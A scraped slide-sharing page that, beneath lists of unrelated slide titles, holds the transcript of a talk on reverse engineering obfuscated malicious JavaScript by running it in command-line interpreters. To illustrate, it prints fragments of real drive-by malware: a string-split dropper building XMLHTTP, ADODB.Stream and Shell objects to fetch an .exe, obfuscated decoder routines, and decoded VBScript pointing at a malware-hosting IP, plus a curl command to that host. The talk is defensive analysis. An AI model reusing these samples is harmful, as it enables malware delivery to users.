Presentación EETAC2TravelPresentación EETAC2Travel
Presentación EETAC2Traveldavidarance
 
ReSo pour les entreprises - Manoo 2. Le recrutement
ReSo pour les entreprises - Manoo 2. Le recrutementReSo pour les entreprises - Manoo 2. Le recrutement
ReSo pour les entreprises - Manoo 2. Le recrutementOlivier A. Maillard
 
Organizational Barriers for Adopting Project Alliancing - Alireza Rahat
Organizational Barriers for Adopting Project Alliancing - Alireza RahatOrganizational Barriers for Adopting Project Alliancing - Alireza Rahat
Organizational Barriers for Adopting Project Alliancing - Alireza RahatAlireza Rahat
 
Instituto Hemingway Bilbao informationen
Instituto Hemingway Bilbao informationenInstituto Hemingway Bilbao informationen
Instituto Hemingway Bilbao informationenInstitutoHemingway
 
Context of smart grids in india knowledge paper of india smart grid day 2013
Context of smart grids in india knowledge paper of india smart grid day 2013Context of smart grids in india knowledge paper of india smart grid day 2013
Context of smart grids in india knowledge paper of india smart grid day 2013L&C
 
Investment theory (final edition)
Investment theory (final edition)Investment theory (final edition)
Investment theory (final edition)Valiente Veera
 
Dispersion of multiple V-groove guide
Dispersion of multiple V-groove guideDispersion of multiple V-groove guide
Dispersion of multiple V-groove guideYong Heui Cho
 
Evangelio Ilustrado. 23º T.O. 9 septiembre
Evangelio Ilustrado. 23º T.O. 9 septiembreEvangelio Ilustrado. 23º T.O. 9 septiembre
Evangelio Ilustrado. 23º T.O. 9 septiembreFranciscanos Valladolid
 

Viewers also liked (20)

Il Diritto d'autore ad uso dei blogger. Le slide della seconda lezione
Il Diritto d'autore ad uso dei blogger. Le slide della seconda lezioneIl Diritto d'autore ad uso dei blogger. Le slide della seconda lezione
Il Diritto d'autore ad uso dei blogger. Le slide della seconda lezione
 
Google
GoogleGoogle
Google
 
How The Open Data Community Died - A Warning From The Future
How The Open Data Community Died - A Warning From The FutureHow The Open Data Community Died - A Warning From The Future
How The Open Data Community Died - A Warning From The Future
 
Metastore ECM verhuist naar Rijen (NB)
Metastore ECM verhuist naar Rijen (NB)Metastore ECM verhuist naar Rijen (NB)
Metastore ECM verhuist naar Rijen (NB)
 
Pla estrategic La salle Alumni 2012 2014
Pla estrategic La salle Alumni 2012 2014Pla estrategic La salle Alumni 2012 2014
Pla estrategic La salle Alumni 2012 2014
 
Nervis villalobos, china
Nervis villalobos, chinaNervis villalobos, china
Nervis villalobos, china
 
Mejores aviones comerciales1
Mejores aviones comerciales1Mejores aviones comerciales1
Mejores aviones comerciales1
 
Sintesis informativa 15 de febrero 2013
Sintesis informativa 15 de febrero 2013Sintesis informativa 15 de febrero 2013
Sintesis informativa 15 de febrero 2013
 
About Galgotia University | Education and Placements
About Galgotia University | Education and PlacementsAbout Galgotia University | Education and Placements
About Galgotia University | Education and Placements
 
Presentación EETAC2Travel
Presentación EETAC2TravelPresentación EETAC2Travel
Presentación EETAC2Travel
 
ReSo pour les entreprises - Manoo 2. Le recrutement
ReSo pour les entreprises - Manoo 2. Le recrutementReSo pour les entreprises - Manoo 2. Le recrutement
ReSo pour les entreprises - Manoo 2. Le recrutement
 
Organizational Barriers for Adopting Project Alliancing - Alireza Rahat
Organizational Barriers for Adopting Project Alliancing - Alireza RahatOrganizational Barriers for Adopting Project Alliancing - Alireza Rahat
Organizational Barriers for Adopting Project Alliancing - Alireza Rahat
 
Guia RáPida De MyEgoo
Guia RáPida De MyEgooGuia RáPida De MyEgoo
Guia RáPida De MyEgoo
 
Instituto Hemingway Bilbao informationen
Instituto Hemingway Bilbao informationenInstituto Hemingway Bilbao informationen
Instituto Hemingway Bilbao informationen
 
Context of smart grids in india knowledge paper of india smart grid day 2013
Context of smart grids in india knowledge paper of india smart grid day 2013Context of smart grids in india knowledge paper of india smart grid day 2013
Context of smart grids in india knowledge paper of india smart grid day 2013
 
Investment theory (final edition)
Investment theory (final edition)Investment theory (final edition)
Investment theory (final edition)
 
Dispersion of multiple V-groove guide
Dispersion of multiple V-groove guideDispersion of multiple V-groove guide
Dispersion of multiple V-groove guide
 
Evangelio Ilustrado. 23º T.O. 9 septiembre
Evangelio Ilustrado. 23º T.O. 9 septiembreEvangelio Ilustrado. 23º T.O. 9 septiembre
Evangelio Ilustrado. 23º T.O. 9 septiembre
 
Clase05 Nov
Clase05 NovClase05 Nov
Clase05 Nov
 
History of Joma
History of JomaHistory of Joma
History of Joma
 

Similar to Reverse Engineering Malicious Javascript

Jazz up your JavaScript: Unobtrusive scripting with JavaScript libraries
Jazz up your JavaScript: Unobtrusive scripting with JavaScript librariesJazz up your JavaScript: Unobtrusive scripting with JavaScript libraries
Jazz up your JavaScript: Unobtrusive scripting with JavaScript librariesSimon Willison
 
How to make Ajax Libraries work for you
How to make Ajax Libraries work for youHow to make Ajax Libraries work for you
How to make Ajax Libraries work for youSimon Willison
 
JavaScript Libraries: The Big Picture
JavaScript Libraries: The Big PictureJavaScript Libraries: The Big Picture
JavaScript Libraries: The Big PictureSimon Willison
 
Efficient JavaScript Development
Efficient JavaScript DevelopmentEfficient JavaScript Development
Efficient JavaScript Developmentwolframkriesing
 
Everything is Awesome - Cutting the Corners off the Web
Everything is Awesome - Cutting the Corners off the WebEverything is Awesome - Cutting the Corners off the Web
Everything is Awesome - Cutting the Corners off the WebJames Rakich
 
Ruby on Rails 101 - Presentation Slides for a Five Day Introductory Course
Ruby on Rails 101 - Presentation Slides for a Five Day Introductory CourseRuby on Rails 101 - Presentation Slides for a Five Day Introductory Course
Ruby on Rails 101 - Presentation Slides for a Five Day Introductory Coursepeter_marklund
 
Web Security Horror Stories
Web Security Horror StoriesWeb Security Horror Stories
Web Security Horror StoriesSimon Willison
 
Streamlining Your Applications with Web Frameworks
Streamlining Your Applications with Web FrameworksStreamlining Your Applications with Web Frameworks
Streamlining Your Applications with Web Frameworksguestf7bc30
 
How to avoid hanging yourself with Rails
How to avoid hanging yourself with RailsHow to avoid hanging yourself with Rails
How to avoid hanging yourself with RailsRowan Hick
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processguest3379bd
 
Lt web quiz_answer
Lt web quiz_answerLt web quiz_answer
Lt web quiz_answer0983676660
 
Nanoformats
NanoformatsNanoformats
Nanoformatsrozario
 
Building an App with jQuery and JAXER
Building an App with jQuery and JAXERBuilding an App with jQuery and JAXER
Building an App with jQuery and JAXERBrian Moschel
 
[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程
[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程
[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程Jimmy Chang
 
Building a JavaScript Library
Building a JavaScript LibraryBuilding a JavaScript Library
Building a JavaScript Libraryjeresig
 
The A to Z of developing for the web
The A to Z of developing for the webThe A to Z of developing for the web
The A to Z of developing for the webMatt Wood
 
Drupal 6 JavaScript and jQuery
Drupal 6 JavaScript and jQueryDrupal 6 JavaScript and jQuery
Drupal 6 JavaScript and jQueryMatt Butcher
 
jQuery Presentation to Rails Developers
jQuery Presentation to Rails DevelopersjQuery Presentation to Rails Developers
jQuery Presentation to Rails DevelopersYehuda Katz
 

Similar to Reverse Engineering Malicious Javascript (20)

Jazz up your JavaScript: Unobtrusive scripting with JavaScript libraries
Jazz up your JavaScript: Unobtrusive scripting with JavaScript librariesJazz up your JavaScript: Unobtrusive scripting with JavaScript libraries
Jazz up your JavaScript: Unobtrusive scripting with JavaScript libraries
 
How to make Ajax Libraries work for you
How to make Ajax Libraries work for youHow to make Ajax Libraries work for you
How to make Ajax Libraries work for you
 
JavaScript Libraries: The Big Picture
JavaScript Libraries: The Big PictureJavaScript Libraries: The Big Picture
JavaScript Libraries: The Big Picture
 
Efficient JavaScript Development
Efficient JavaScript DevelopmentEfficient JavaScript Development
Efficient JavaScript Development
 
Everything is Awesome - Cutting the Corners off the Web
Everything is Awesome - Cutting the Corners off the WebEverything is Awesome - Cutting the Corners off the Web
Everything is Awesome - Cutting the Corners off the Web
 
Ruby on Rails 101 - Presentation Slides for a Five Day Introductory Course
Ruby on Rails 101 - Presentation Slides for a Five Day Introductory CourseRuby on Rails 101 - Presentation Slides for a Five Day Introductory Course
Ruby on Rails 101 - Presentation Slides for a Five Day Introductory Course
 
Web Security Horror Stories
Web Security Horror StoriesWeb Security Horror Stories
Web Security Horror Stories
 
Time for Comet?
Time for Comet?Time for Comet?
Time for Comet?
 
Streamlining Your Applications with Web Frameworks
Streamlining Your Applications with Web FrameworksStreamlining Your Applications with Web Frameworks
Streamlining Your Applications with Web Frameworks
 
How to avoid hanging yourself with Rails
How to avoid hanging yourself with RailsHow to avoid hanging yourself with Rails
How to avoid hanging yourself with Rails
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
 
Lt web quiz_answer
Lt web quiz_answerLt web quiz_answer
Lt web quiz_answer
 
Os Wilhelm
Os WilhelmOs Wilhelm
Os Wilhelm
 
Nanoformats
NanoformatsNanoformats
Nanoformats
 
Building an App with jQuery and JAXER
Building an App with jQuery and JAXERBuilding an App with jQuery and JAXER
Building an App with jQuery and JAXER
 
[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程
[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程
[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程
 
Building a JavaScript Library
Building a JavaScript LibraryBuilding a JavaScript Library
Building a JavaScript Library
 
The A to Z of developing for the web
The A to Z of developing for the webThe A to Z of developing for the web
The A to Z of developing for the web
 
Drupal 6 JavaScript and jQuery
Drupal 6 JavaScript and jQueryDrupal 6 JavaScript and jQuery
Drupal 6 JavaScript and jQuery
 
jQuery Presentation to Rails Developers
jQuery Presentation to Rails DevelopersjQuery Presentation to Rails Developers
jQuery Presentation to Rails Developers
 

Recently uploaded

Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DaySri Ambati
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 

Recently uploaded (20)

Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 

Reverse Engineering Malicious Javascript

  • 1. Reverse Engineering Malicious Javascript Jose Nazario, Ph.D. <jose@arbor.net>
  • 2. Problem, Solution, You Bad guys want to get malware on your box. They don’t want your security systems to detect their known exploits. So they obfuscate them. By the end of this talk you’ll be armed with techniques to defeat their techniques. arbornetworks.com Page 2 Company Confidential
  • 3. JavaScript Introduction • Created by Netscape, in almost all browsers now • In-browser scripting • Mix of procedural and OOP • Supports events, regular expressions • Everything is a reference, even functions arbornetworks.com Page 3 Company Confidential
  • 4. Confusion: Mixed Programming Styles • quot;newquot; keyword to create an object • Nest functions mean classes and methods • Make a function function add(x, y) { return x + y; } arbornetworks.com Page 4 Company Confidential
  • 5. OOP JavaScript • Make a class with methods function MyNumber() { function add(x, y) { return x + y; } } n = new MyNumber() print(n.add(1, 2)); arbornetworks.com Page 5 Company Confidential
  • 6. Getting JavaScript to the Browser • Embed in page <script language=quot;JavaScript”> document.write(quot;Hello, world!quot;); </script> • Specify a file to include <script src=quot;path/to/file”></script> arbornetworks.com Page 6 Company Confidential
  • 7. References • JavaScript Guide – http://wp.netscape.com/eng/mozilla/3.0/handbook/javas cript/ • JavaScript Language Resources – http://developer.mozilla.org/en/docs/JavaScript_L anguage_Resources • JavaScript: The Definitive Guide, Fifth Edition – http://www.oreilly.com/catalog/jscript5/ arbornetworks.com Page 7 Company Confidential
  • 8. Object Hierarchy • Browser – Window • History • Location • Document arbornetworks.com Page 8 Company Confidential
  • 9. JavaScript: The Definitive Guide By David Flannagan; ISBN: 1-56592-235-2, 637 pages. Second Edition, January 1997 arbornetworks.com Page 9 Company Confidential
  • 10. Important Objects • Document – The current HTML – Methods • write() • writeln() • Location – Where you currently are (URL) – Methods • reload() • replace() arbornetworks.com Page 10 Company Confidential
  • 11. Global Functions We Care About •print() -- print the arguments to stdout •eval() -- treat the arguments as code to execute •encode() -- convert to ASCII %xx expressions •decode() -- convert from ASCII %xx expressions •alert() -- displays a modal browser dialog •+ operator -- concatenate strings (like Java) arbornetworks.com Page 11 Company Confidential
  • 12. Events We Care About •onLoad() -- execute a code block when the window loads •onUnload() -- execute a code block when the window closes or changes •onSubmit() -- executes a code block when a form is submitted arbornetworks.com Page 12 Company Confidential
  • 13. What is Malicious JavaScript? • Delivers browser exploits – ADODB.Stream(), setSlice(), etc • Often drops ActiveX/VBScript content • Used to download malware onto the system • Obfuscation to avoid simple signatures arbornetworks.com Page 13 Company Confidential
  • 14. What is Obfuscated JavaScript? • Simple: JavaScript with opaque code to thwart static review • Hides author’s methods and intents • Varying degrees of obfuscation • FromCode() - Simple ASCII chr(), ord() • Base64 encoding – iWebTool HTML Encrypt • http://www.iwebtool.com/html_encrypter • String splits • Customer encoder – Advanced HTML Protector • http://www.creabit.com/htmlprotect/ arbornetworks.com Page 14 Company Confidential
  • 15. Simple Base64 Encode arbornetworks.com Page 15 Company Confidential
  • 16. Simple Decode with NJS • Strip <script> and HTML tags • Change document.write() to print() $ js iweb.js <html> <head> <title>Hello</title> </head> <body> <h1>Hello there.</h1> </body> </html> arbornetworks.com Page 16 Company Confidential
  • 17. Simple String Join Example function ravlhhwx(zxnkfzz) { gqibom = quot;Gquot;+quot;Equot;+quot;Tquot;; var mjb = quot;http://www.newoldway.info/c/1900/counter21.php?a=3&c=3quot;; runbj = quot;Xquot;+quot;Mquot;+quot;LHquot;+quot;TTPquot;; var gzfzi = zxnkfzz.CreateObject(quot;Scriptiquot;+quot;nquot;+quot;gquot;+quot;.quot;+quot;FileSystquot;+quot;emObjectquot;, quot;quot;) juezny = quot;Shequot;+quot;llquot;; ifhhye = quot;Aquot;+quot;DOquot;+quot;DBquot; vkdvhle = quot;kppoquot;+quot;.exequot;; wrrb = quot;.quot;; jyknv = quot;GETquot;; daxhi = quot;Aquot;+quot;pplicaquot;+quot;tionquot;; vvu = quot;.quot;; rramwz = quot;Squot;+quot;tquot;+quot;rquot;+quot;equot;+quot;amquot;; ybxbb = quot;MSquot;+quot;Xquot;+quot;MLquot;+quot;2quot;; … Simple string splits and joins, builds an AJAX object arbornetworks.com Page 17 Company Confidential
  • 18. More Complicated Example dF('%2A8HXhwnuy%2A75Qfslzflj%2A8I%2A7%3COf %7BfXhwnuy%2A7%3C%2A8Jithzrjsy3%7Cwnyj%2A7 %3D%2A7%3C%2A8H%2A7Kyj%7Dyfwjf%2A8J%2A%3AH %2A7%3C%2A77%2A8J%2A7%3C%2A7%3E%2A8Gnk%2A7 %3Dithzrjsy3ZWQ3xzgxywnsl%2A7%3D5%2A7H9%2A 7%3E%2A8I%2A8I%2A7%3Cmyyu%2A7%3C%2A7%… What the heck is dF()? A custom decoder. What is this code doing? Let’s find out. arbornetworks.com Page 18 Company Confidential
  • 19. Two Options … • Manually XOR, mask, array lookup, etc … Or brute force • I chose brute force, I’m lazy • How? Get the JavaScript to the point where the browser could actually use it arbornetworks.com Page 19 Company Confidential
  • 20. Bad Idea: Using the Browser • Several people like to do this • Wrap questionable JavaScript in <textarea> tags – document.write() will wind up there – eval() will still work • Replace document.write() with alert() – Suggestions from http://handlers.sans.org/dwesemann/decode/index.html • Good luck getting full info from a browser under 0day conditions – Increasing amount of browser-based debugging attacks and defenses arbornetworks.com Page 20 Company Confidential
  • 21. Better Idea: Divorce the JS Engine from the Browser NJS SpiderMonkey Rhino (Jscript in Java) arbornetworks.com Page 21 Company Confidential
  • 22. Decoding Malicious JS On The CLI • Cut and paste JavaScript code body or bodies into a file • Strip any extraneous HTML tags – These JS tools don’t understand HTML • Save file • Evaluate with NJS js(1) arbornetworks.com Page 22 Company Confidential
  • 23. NJS JavaScript Toolkit • NJS is an independent implementation of the JavaScript language developed by Netscape and standardized by ECMA. It is designed to be re-entrant, extendible, fast, and programmable. • http://www.njs-javascript.org/ • Builds on OS X, UNIX, etc … arbornetworks.com Page 23 Company Confidential
  • 24. Cleaning Up The Mess • Change eval() to print() • Change document.write() to print – Alternatively create a document object with a write() method (equivilent to print()) • Prepend all of the needed bits arbornetworks.com Page 24 Company Confidential
  • 25. Iterative Example Cut and paste malicious JS body $ cat mal.js var h=quot;+rg&.3fv_m2Hd0P%s)(El=zw>tSnou<- p hy4xBA9W?T6/18… Now try and execute $ js mal.js VM: warning: using undefined global `document' js: evaluation of file `mal.js' failed: StringStream:0: illegal object for call_method arbornetworks.com Page 25 Company Confidential
  • 26. Iterative Example (cont) $ js mal.js function i(y){var f='',z,q,w,v;for(z=0;z<y.length;z++){q=y. charAt(z);w=h.indexOf(q);if(w>- 1){v=((w+1)%x- 1);if(v<=0){v+=x}f+=h.charAt(v- 1)}else{f+=q}}c+=f};function jjj(){document.write(c);g=quot;quot;} VM: warning: using undefined global `i' js: evaluation of file `mal.js' failed: mal.js:8: illegal function object in jsr arbornetworks.com Page 26 Company Confidential
  • 27. Iterative Example (cont) • Code in red is a decryptor we need in the page • Cut and paste this function i() into the head of mal.js • Rerun through js(1) arbornetworks.com Page 27 Company Confidential
  • 28. Iterative Example (concl) $ js mal.js function i(y){var f='',z,q,w,v;for(z=0;z<y.length;z++){q=y.charAt(z);w=h.ind exOf(q);if(w>-1){v=((w+1)%x- 1);if(v<=0){v+=x}f+=h.charAt(v- 1)}else{f+=q}}c+=f};function jjj(){document.write(c);g=quot;quot;} <script language=quot;JavaScriptquot; type=quot;text/javascriptquot;> var vuln_x, vuln_y, vuln_w, vuln_h; function vuln_calc() { var root= document[ (document.compatMode=='CSS1Compat') ? 'documentElement' : 'body' ]; vuln_x= window.screenLeft+68; vuln_y= window.screenTop-19; //vuln_w= 420; vuln_w= root.offsetWidth-220; vuln_h= 17; vuln_show(); }… arbornetworks.com Page 28 Company Confidential
  • 29. Double Decodes • Clean up HTML • Decode on the CLI • Result: More encoding! • Repeat until it’s not encoded any longer arbornetworks.com Page 29 Company Confidential
  • 30. Example (Week of March 21, 2007) $ curl http://58.65.239.106/cosmos/gcs_1/ | tee mal.js <script language=JavaScript>function makemelaugh(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,23,22,45,3 2,14,57,50,40,62,0,0,0,0,0,0,49,25,24,18,43,16,5,8,30,15, 54,35,17,11,33,56,47,51,41,7,3,58,26,48,0,55,4,0,0,0,0,36 ,0,46,52,37,44,42,21,6,39,19,20,29,34,1,13,27,59,10,61,2, 12,31,60,9,38,53,28);for(j=Math.ceil(l/b);j>0;j-- ){r='';for(i=Math.min(l,b);i>0;i--,l-- ){w|=(t[x.charCodeAt(p++)- 48])<<s;if(s){r+=String.fromCharCode(170^w&255);w>>=8;s- =2}else{s=6}}document.write(r)}}makemelaugh(quot;qsq84VRO9ua6 qqr@gizJE59pjsecG1dQiiw84sec6h59KDP0qVv7ZYvYMYvQ1lG08hu7B IdJHKGc4e8lqsU6FpvYg0zrUPdYsuwlsp3YVTANF9R_Z76hZlAxiCOxV7 ANw1zJS1zJFJz7A10xFJvQHi8JsDkctId@Iu6QC0tl4selqeOOt… arbornetworks.com Page 30 Company Confidential
  • 31. Prepare The Decode function MyDoc () { function write(x) { print(x); } } document = new MyDoc(); // delete HTML tags function makemelaugh(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array( 63,23,22,45,32,14,57,50,40,62,0,0,0,0,0,0,49 ,25,24,18,43,16,5,8,30,15,54,35,17,11,33,56, 47,51,41,7,3,58,26,48,0,55,4,0,0,0,0,36,0… arbornetworks.com Page 31 Company Confidential
  • 32. Execute the Decode $ js mal.js <HTML xmlns:IE> <body> <SCRIPT language=quot;VBScriptquot;> Module_Path=quot;http://58.65.239.106/cosmos/gcs_1/get.php?file=exequot; If navigator.appName=quot;Microsoft Internet Explorerquot; Then If InStr(navigator.platform,quot;Win32quot;) <> 0 Then Const ssfFONTS=20 Const adModeReadWrite=3 Const adTypeBinary=1 Const adSaveCreateOverWrite=2 … arbornetworks.com Page 32 Company Confidential
  • 33. Refetch, Smaller JScript <script language=JavaScript>function makemelaugh(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,15,24 ,60,26,0,2,52,5,42,0,0,0,0,0,0,23,28,58,51,25,39,12, 10,33,17,53,14,29,37,1,46,6,43,4,18,9,62,59,54,30,20 ,47,0,0,0,0,8,0,22,34,7,36,3,41,38,49,27,55,31,32,57 ,21,56,45,40,19,61,13,50,48,35,16,11,44);for(j=Math. ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i-- ,l--){w|=(t[x.charCodeAt(p++)- 48])<<s;if(s){r+=String.fromCharCode(170^w&255);w>>= 8;s- =2}else{s=6}}document.write(r)}}makemelaugh(quot;G4Du1rz j1wtMm@FW21sbGKkhkQooBQovDQ_uP@AuN0zCR4DHT0FhX0FWY6quot; )</script> arbornetworks.com Page 33 Company Confidential
  • 34. Execute … Enjoy! $ js mal1.js <center>Sorry! You IP is blocked.</center> arbornetworks.com Page 34 Company Confidential
  • 35. Life Isn’t Always This Easy • Lots of defensive JavaScript coming around • Kills all sorts of inspection routines • Don’t run this in the browser! arbornetworks.com Page 35 Company Confidential
